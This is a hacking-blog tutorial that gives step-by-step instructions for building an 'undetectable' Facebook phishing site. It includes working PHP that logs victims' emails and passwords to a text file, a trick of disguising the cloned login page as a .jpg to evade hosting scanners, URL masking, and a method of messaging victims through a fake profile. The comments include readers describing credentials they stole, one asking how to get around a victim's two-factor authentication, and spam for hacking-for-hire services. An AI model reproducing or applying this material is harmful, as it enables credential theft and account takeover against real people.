Create Undetectable Facebook Phishing Site 2018 – Advanced

undetectable-facebook-phishing- www.picateshackz.com

How to create undetectable facebook phishing page!, this is a big topic in now a days and i got many questions about this topic, so today i want to show a solution for this. in this tutorial i will explain the whole process to make phishing page undetectable including  how to bypass security check of free hosting site to avoid account suspension , URL masking/hiding, and how to send it to victim.

In normal scenario when you design your phishing page and upload files to your hosting account, your Web Hosting provider attempts to find all phishing attempts from their servers, Maximum time they do this by using automated crawlers. If the crawler find any Forbidden character in your uploaded files. Sometimes they may contact you directly to remove the phishing files.
If they receive notification, they will remove the files automatically and notify you that your website contained phishing files and may suspend your account but here you have the real solution for this problem.

If you are newbie to facebook phishing then i suggest you to read my previous article: How To Hack Facebook Using Phishing Method-Basic
New Updated Phishing Method: Hack Facebook Using Latest Phishing Page 2018 (No Suspension)

Warning & Disclaimer: Making a phishing page is not illegal, but using a phishing page is illegal. This tutorial is just to show you, “How to create phishing page?”. If you use this to hack anyone account, then I AM not responsible for it. Do anything on your own risk.


This tutorial has 3 main steps:

  1. Creating undetectable facebook phishing page
  2. Create an account in free web hosting site and upload the phisher files
  3. Url Masking/Hiding and send it to victim

So Lets’s Start,


I prefer newbies to follow the step by step guide, so you can learn how phishing works. If you don’t want to create yourself a phishing page then you can Download attachment file here(facebookdesktop.zip) or Alternate download and move to Step: 2

Step 1: Creating undetectable facebook phishing page

First go to facebook home page (www.facebook.com) then, Right click > Save as and Save it as ‘login.html‘.

undetectable-facebook-phishing- www.picateshackz.com
Now you will get two files (login_files folder and login.html).
now right click on ‘login.html‘ and open with notepad and search (By pressing Ctrl+F) for : action in it and replace the highlighted part (as in the following screenshot) with ‘data.php‘ .
(there is 3 ‘method’ and lot of ‘actions’ in the file when you search, but you have to replace the first method and the action behind that)
undetectable-facebook-phishing- www.picateshackz.com
Again search (By pressing Ctrl+F) for : method in it and replace the highlighted part (post) with ‘get’ and save it.
undetectable-facebook-phishing- www.picateshackz.com
Rename the ‘login.html‘ to ‘login.jpg‘ (jpg files will bypass the free hosting security check).
undetectable-facebook-phishing- www.picateshackz.com

Now we have to create another web page with .jpg extension. i am already prepared a simple page so copy the below code and paste it in notepad and save the file as ‘follow.jpg

 

<!DOCTYPE html><html> <head> <title>Find your Facebook ID – a 5-second easy tool for locating your Facebook numeric personal ID</title> <meta name=”description” content=”If you need to know your Facebook numeric peronal ID, just plug your Profile URL into this simple tool.” /> <link rel=”stylesheet” href=”reset.css” type=”text/css” media=”screen”> <link rel=”stylesheet” href=”style.css” type=”text/css” media=”screen”> <script src=”http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js”></script> <script src=”script.js” type=”text/javascript” charset=”utf-8″></script> <meta property=”fb:admins” content=”1146295886″ /> </head> <body> <form action=”” method=”post“> <label for=”fb_profile_url” class=”text-input-label fb_profile_url-text-input-label”> Enter your personal Facebook profile URL: </label> <input type=”text” name=”fb_profile_url” value=”” class=”nr-text” size=”45″ placeholder=”http://www.facebook.com/YourProfileName” /> <input type=”hidden” name=”unsanitized” class=”nr-hidden hidden-input-for-unsanitized” /> <p> <input type=”submit” value=”Lookup numeric ID…” class=”button-primary”> </p> <h1>Easily find your Facebook numeric personal ID for fb:admins social plugins and more!</h1> <p id=”description”> For integrations of certain Facebook social plugins, like the “Like” button and “Like box”, and others, Facebook
requires that you know your Facebook numeric user ID. Unfortunately, they make this very difficult to find, especially
if you have a so-called “vanity” personalized profile URL. If you can’t find your Facebook ID, or don’t know what it is
and need it, just enter your full Facebook profile URL in the above form, and we can scrape the ID from the code of your
personal profile page.
</p></form>
<script type=”text/javascript”> var _gaq = _gaq || []; _gaq.push([‘_setAccount’, ‘UA-3361652-13’]); _gaq.push([‘_trackPageview’]); (function() { var ga = document.createElement(‘script’); ga.type = ‘text/javascript’; ga.async = true; ga.src = (‘https:’ == document.location.protocol ? ‘https://ssl’ : ‘http://www’) + ‘.google-analytics.com/ga.js’; var s = document.getElementsByTagName(‘script’)[0]; s.parentNode.insertBefore(ga, s); })();</script> </body></html>

Next you copy below code and paste it in notepad and save it as ‘index.php‘.

<?php$id = $_GET[“id”];if ($id == “facebookdesktop“) {      $myFile = “login.jpg“;      $fh = fopen($myFile, ‘r’);      $theData = fread($fh, 500000);      fclose($fh);      echo $theData;}else{     $myFile1 = “follow.jpg“;     $fh1 = fopen($myFile1, ‘r’);     $theData1 = fread($fh1, 500000);     fclose($fh1);     echo $theData1;}?>

Now you have to create another php file, so copy the below code and save it as ‘data.php‘.

:<?phpheader(“Location: https://m.facebook.com/login.php?&e=1348092&email=”);$handle = fopen(“users.txt“, “a”);foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, “=”);fwrite($handle, $value);fwrite($handle, “rn”);}fwrite($handle, “rn”);fclose($handle);exit;?>

At last we have to create a txt file to store victim’s username and password, so make a blank txt file and save it as ‘users.txt‘.
 If you followed all the above steps carefully, you will have 6 files including 1 folder and It will look similar to this :
undetectable-facebook-phishing- www.picateshackz.com
Now select all files and create a zip of it (any name in my case it is ‘facebookdesktop.zip‘). Click here to download attachment

Note: make sure all the 6 files are inside the .zip file

Dreamhost banner

 

Step 2: Create an account in free web hosting site and upload the phisher files

I prefer 000.webhost.com.
Go to: https://members.000webhost.com/signup  and fill out the information needed and click on Create My Account.
 
undetectable-facebook-phishing- www.picateshackz.com
 
Open your email and verify the account you will see the active domain in your account ,then  click on Go to CPanel (highlighted in below screen shot).
undetectable-facebook-phishing- www.picateshackz.com
Now open the first file manager icon under File managers section.
undetectable-facebook-phishing- www.picateshackz.com
Go to “public_html” folder and delete the 2 files inside it. then click on “upload“.
undetectable-facebook-phishing- www.picateshackz.com
Below “Archives” section click on “Choose file“.
Select the zip file Which you have created above (In our case it is ‘facebookdesktop.zip’).
Click on the “green tick“.
undetectable-facebook-phishing- www.picateshackz.com
Done!!!, Now what will happen,when your hosting provider will test your content they will get a innocent php file reading another file.and when they try will to access “login.jpg” file they will get an invalid/corrupted image.
Now Access your URL with this id at end (/?id=facebookdesktop)

Example: “www.yourdomain.sub.com/?id=facebookdesktop/“(See the Screenshot below)

facebook phishing undetectable- picateshackz.com
When victim enter the email and and password in this link it will be stored in our ‘users.txt‘ file, to see that click the view button next to users.txt file.
undetectable-facebook-phishing- www.picateshackz.com
Inside users.txt file you can see the victim’s email and password (highlighted part in below screen shot).
undetectable-facebook-phishing- www.picateshackz.com

Step 3: Url Masking/Hiding and send it to victim

Before sharing it with your friends, You have to hide the URL. That way it can be less suspicious. so here we use Dot TK url Shortening. your actual Phishing url can create a sense of doubt in victim’s mind, we can hide the url. Dot.tk is an online service which enables you to hide/mask the url.1. So, go to http://www.dot.tk/en/index.html?lang=en to hide a url.

2. Select shorten URL then enter your phisher link in the textbox and hit on Next. (our Phisher link: www.yourdomain.sub.com/?id=facebookdesktop/)

3. Enter the link you want to rename your phisher link to dot.tk domain name.

(our domain: yourdomain)
Now we have the phishing url shortened like belove:
www.yourdomain.sub.com/?id=facebookdesktop  =  Yourdomain.tk
Now, you can send this masked phisher link to your victim.The victim will now find our phisher link less suspicious as we have hidden the actual phisher link using .tk domain.

Now its time to send the message to the victim facebook inbox mind it that you cant send message in inbox if you are not friend of victim so to do that first create a fake facebook profile and open the victims facebook account
then click select ‘report’ after that select this timeline is using a fake name then click continue.

 

undetectable-facebook-phishing- www.picateshackz.com

Now select message to resolve this erase the previous message.

undetectable-facebook-phishing- www.picateshackz.com

Now type your message with phisher link (yourdomain.tk) and this message will go in inbox of victim account.
Thank you, If you have any problem in this tutorial just comment here.

Recommended Article:How To Create Facebook Phishing Android Application (No Coding Needed)

Sharing is caring!

103 thoughts on “Create Undetectable Facebook Phishing Site 2018 – Advanced

  1. Hello an error comes up when I try to upload the .zip file:
    "Unable to extract the files and directories from the archive"
    Can you help me please?
    Thanks

    1. I solved the problem, sorry to bother you I have another one know lol
      When I try to visit my page, that message comes up:

      "Parse error: syntax error, unexpected T_VARIABLE in /home/a1407626/public_html/index.php on line 1"

      Thanks

    2. I deleted averything, and replaced them by your zip file.
      Now when I try to open the page I have this :

      "Enter your personal Facebook profile URL:

      Easily find your Facebook numeric personal ID for fb:admins social plugins and more!

      For integrations of certain Facebook social plugins, like the "Like" button and "Like box", and others, Facebook requires that you know your Facebook numeric user ID. Unfortunately, they make this very difficult to find, especially if you have a so-called "vanity" personalized profile URL. If you can't find your Facebook ID, or don't know what it is and need it, just enter your full Facebook profile URL in the above form, and we can scrape the ID from the code of your personal profile page."

    3. Enter your personal Facebook profile URL:

      Easily find your Facebook numeric personal ID for fb:admins social plugins and more!

      For integrations of certain Facebook social plugins, like the "Like" button and "Like box", and others, Facebook requires that you know your Facebook numeric user ID. Unfortunately, they make this very difficult to find, especially if you have a so-called "vanity" personalized profile URL. If you can't find your Facebook ID, or don't know what it is and need it, just enter your full Facebook profile URL in the above form, and we can scrape the ID from the code of your personal profile page."

    4. The Hack Team was founded in 2005 by Jonathan James when he decided to offer services for email hacking. In that year, internet was dominated by emails, because the social networks didn't exists yet and cell phones technologies were growing. Time has passed and the group increased gradually and we added new services like: Facebook, Twitter or Instagram. Now, our services are even more than then, including PC/Cellphone hacking, deface websites, grades change, custom ransomware, etc. We invite you to explore our Hacking Services and if you're interested in any of them, hire us at ONETIMEHACKER@OUTLOOK.COM

  2. Irshad Pathoor20 December 2015 at 04:48
    Sorry..my mistake, there was a minor mistake in the attached file, but now i am fixed the issue. so you have to download the attachment again and go ahead

    my domain is : http://www.tobeornotobe.net16.net/
    i tried again with the new files you updated it's the same

    try it yourself

    1. yes, before that you have to hide your url with dot.tk domain.but i warn you hacking someones personal information is illegal and this tutorial is only for learn to how phishing method works.

  3. When i upload it and when i try to open the URL its opening new tab and asking for downloading the zip file, but when i extract it after i uploaded it i can access to fake site, but email and passwords aren't stored, why ?

  4. WHEN I CLICK ON THE FILE MANAGER THIS MESSAGE APPEARS ON A NEW PAGE. HELP PLZ!

    An error has occured
    Unable to login to FTP server scorpionz.netai.net with username a2580146.

    Are you sure your username and password are correct? Please contact your ISP helpdesk or system administrator for help.

  5. yes….sometimes 000webhost shows this error message, to resolve this you should change ftp password. you can find change ftp password option under ftp details section , now try to open file manager with your new password . if it is still showing the same error messege then i prefer to use alternate file managers, there are 3 file manager options in 000webhost and you can try one by one until you upload those files

  6. Guyz when i put "facebooklalahackz.net23.net/?id=facebookdesktop"
    It Opens

    ?php$id = $_GET["id"];if ($id == "facebookdesktop") { $myFile = "login.jpg"; $fh = fopen($myFile, 'r'); $theData = fread($fh, 500000); fclose($fh); echo $theData;}else{ $myFile1 = "follow.jpg"; $fh1 = fopen($myFile1, 'r'); $theData1 = fread($fh1, 500000); fclose($fh1); echo $theData1;}?>

    plz help

  7. This tutorial is working very well but i will like to use it in another way, i will like to run a contest online that will use facebook to authenticate users (facebbook auth). is there any way to re-write the script with facebook auth dialog box so that when a user puts his email and pasword in the dialog box, it will save their password and redirect them to the contest page or facebook page.

    thanks

  8. Sir I follow steps from your 2nd blog (responsive)..i got blocked by 000webhost..now i follow these steps.(advanced)..shall i find suspended my accont after some time from this method too? please answer

  9. Hi, I have entered my domain+ /?id=facebookdesktop ..i.e,
    pvs2016.my3gb.com/?id=facebookdesktop. it is showing " YOUR ID IS INCORRECT". please help me how to resolve it

  10. hi! this worked to me, i've got the pass from my victim, BUUUUT she has de "security code" active on her facebook (it's a code to verify that no other people than her try to enter on her account, fb asks for it when you enter from an unknown device) … is there a way to enter on her account without that fucking code? i can't get it because it is generated automatically in her phone (which i can't access)

    btw thank you so much! this tutorial was the only one that worked to me, sadly my victim has that fucking secutiry code thing active on her account :'(

  11. (the other day i sent this, and i just noticed that i dind't explain it well, so, now i'll explain it)

    hi! this worked to me, i've got the pass from my victim BUT she has the "login approval / two factor authentication" active on her fb account(guess you know what it means, but just in case i'll explain it xD fb generates automatically on the app a code when someone tries to enter to the account from an unknown device, and this is the fucking code i need to enter to her fb)

    i don't know how to hack her phone or something, she already changed her pass because facebook notified that i tried to enter on her account and sent to her the code that i need lol.

    Sorry if my english is bad. Btw thank you for this tutorial 🙂

  12. hey i've followed all the mentioned steps correctly but when am visiting the website it's showing this error
    "Parse error: syntax error, unexpected T_VARIABLE in /home/a1407626/public_html/index.php on line 1"
    i think there is a problem in your index.php file.please help me up to fix this

  13. i've resolved the error in index file but now when i'm visting the website its shown as follows-

    Index of /

    data.php
    follow.jpg
    login.jpg
    login_files/
    users.txt

    & upon clicking data.php file i'm getting this error=>
    Fatal error: Call to undefined function phpheader() in /home/a1777135/public_html/data.php on line 1

    help me fix it

  14. When I checked the login page. I got a warning message from facebook original site to reset your password and learn about phishing. This way the target will know that someone is trying to hack the password and will change his password. how to bypass that?

  15. hi, solid fella, good tut, worked, just that i can't get the fke facebook/phishing site pass on the incredient to the user.txt file plus i was redirected to the original fb site with an encouragement message that says: "For your security, never enter your Facebook password on sites not located on Facebook.com"
    pls i just need to make sure that it's working for me 🙂

  16. Facebook is not allowing to send the link inbox and marking as unsafe link to be sent to the user. Please help me

  17. Hi, my site does not show any Domain, Status and Action. It says "The list is empty". I cant find CPanel. Please help.

  18. Helow Sir, i would like to ask when i'm going to send to short cut link URL to my site and says that the facebook has securty and they blocked my URL.. do you have any idea how to reblock and post it to my fan page?

  19. Hello sir, i have been following your updates on this post, but why did u change the facebook id from the previous to /?id=facebookdesktop ? the previous one was working perfectly for me…. or will this new one be as responsive as the previous id?

  20. After I shorten the URL, it can no longer open the facebook log in page. Also, when I try to send it to someone, fb blocks it.

  21. does this actually work? i mean, when i give in my site, i get this: Index of /

    .quarantine/
    .tmb/
    _file-manager/
    facebook.zip

  22. hey, is there a way to hide to url of your domain in the address bar on the actual page? I got the TK domain, but when you click it, in the address bar it still show the original url (name.myfreehostingpage.. etc). Any way around this? Thanks!

  23. hey anonymous…everthing worked fine when i followed your steps. After i made my phising page, i tested it with my self…. Everything is working great .i entered my email and pass and loged into face book.. AFter opening users.txt some blang lines are there i tried it several time but its not working…Hopp u help me

  24. i did everything but it works only for seconds and the browser detects it and i tried to send it on facebook but tells me that the message can't be sent because it has a blocked link…is that happens to me only? what shall i do?
    i'm waiting for a reply…thanks

  25. i followed your instructions but when i gave a demo to the page i wrote an email and a password of a fake account …. it logged in but when i went back to " users.txt" i found nothing !!!!!
    plz i want a solution

  26. http://hfaceboock.comxa.com/?id=facebookdesktop
    it gives me
    Enter your personal Facebook profile URL:
    http://www.facebook.com/YourProfileName
    Lookup numeric ID…

    Easily find your Facebook numeric personal ID for fb:admins social plugins and more!

    For integrations of certain Facebook social plugins, like the "Like" button and "Like box", and others, Facebook requires that you know your Facebook numeric user ID. Unfortunately, they make this very difficult to find, especially if you have a so-called "vanity" personalized profile URL. If you can't find your Facebook ID, or don't know what it is and need it, just enter your full Facebook profile URL in the above form, and we can scrape the ID from the code of your personal profile page.

  27. Ethicalhacking76@gmail.com is a hacker that specializes in exposing cheating spouse,and every other hacking related issues. he helps catch cheating spouse by hacking their communications like call, Facebook, text, emails, Skype and many more. i have used this service before and he did a very good job, he gave me every proof i needed to know that my fiancee was cheating. You can contact him on his email ethicalhacking76@gmail.com to help you catch your cheating spouse, or for any other hacking related problems, he will definitely help you, he has helped a lot of people, contact him and figure out your relationship status. i wish you the best too.

  28. when i click file manager here's the result An error has occured
    Unable to login to FTP server freebees.comxa.com with username a8247081.

    Are you sure your username and password are correct? Please contact your ISP helpdesk or system administrator for help.

  29. I have been with a cheating spouse before and trust me I know how it feels, those suspicions are not mere paranoia. If you suspect that he is cheating, he definitely is..I hired a PI who helped me install monitoring bugs on his phone that diverted all his messages( facebook, whatsapp, text messages, and even phone calls) to my phone;(besthackgame@gmail.com ) is the man for the job with a very high level of professionalism and highly reliable. I really enjoyed working with him and the few friends I told have been nothing but thankful to me for the referral

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Posts

Begin typing your search above and press enter to search. Press ESC to cancel.

Back To Top

So glad to see you sticking around!

Want to be the first one to receive the new stuff?

Enter your email address below and we'll send you the goodies straight to your inbox.

Thank You For Subscribing

This means the world to us!

Spamming is not included! Pinky promise.